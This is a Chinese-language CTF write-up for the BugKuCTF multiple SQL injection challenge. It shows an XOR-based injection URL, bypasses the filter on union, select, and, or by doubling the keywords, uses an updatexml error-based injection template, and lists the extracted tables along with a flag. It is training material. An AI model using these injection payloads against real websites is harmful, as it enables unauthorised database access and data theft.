BugKuCTF 多次 SQL injection
程序员文章站
2022-05-15 11:51:43
...
异或注入
两个条件相同(同真或同假)即为假
如果返回页面显示正常,那就证明length(‘union’)==0的,也就是union被过滤了
http://120.24.86.145:9004/1ndex.php?id=1'^(length('union')!=0)--+
发现过滤了 union or and select 等等关键字
双写绕过
注得数据库结构如下
- web1002-1
- flag1
- flag1 //提交之后是错的
- address //注出地址:Once_More.php?id=1
- hint
- id
- contents
- flag1
报错注入
进入新的页面说是用了最好的waf
模板
updatexml(1,concat(0x7e,(......),0x7e),1)
注得数据库结构如下
(这回里面是真flag 当然先注flag 至于我为什么要把别的也注出来 我也不知道。。。。。)
- web1002-2
- class
- id //1,2,3,4,5,6,7
- name //TOM,Jack,Mack,Jones,James,Fox,H
- flag2
- flag2 //真flag flag{Bugku-sql_6s-2i-4t-bug}
- address //注出 ./Have_Fun.php 里面还有个题目
- class
what?????吓死我了
提示里说到 flag里面是小写 改成小写就对了。。。。我还以为翻车了呢
彩蛋
xff改一下出来个二维码
进入ErWeiMa.php还是显示 这个二维码
无思路。。。。。
扫站扫到 admin.php 感觉很可能是这个指的admin
但是全空白 加了game参数似乎也没任何反应。。。。
sqlmap game参数跑了好久也是没反应。。。
真不会了。。。。
下一篇: GET型sql注入基础(二)
推荐阅读
-
ORACLE LATERAL-SQL-INJECTION 个人见解
-
一个asp函数, 解决SQL Injection漏洞
-
vBulletin Forum 2.3.xx SQL Injection
-
用PHP函数解决SQL injection
-
DVWA V1.9:SQL Injection(SQL注入)
-
攻击方式学习之SQL注入(SQL Injection)第3/3页
-
Web安全相关(五):SQL注入(SQL Injection)
-
BurpSuite教程与技巧之SQL Injection
-
Discuz! 4.x SQL injection / admin credentials disclosure exploit
-
攻击方式学习之SQL注入(SQL Injection)第1/3页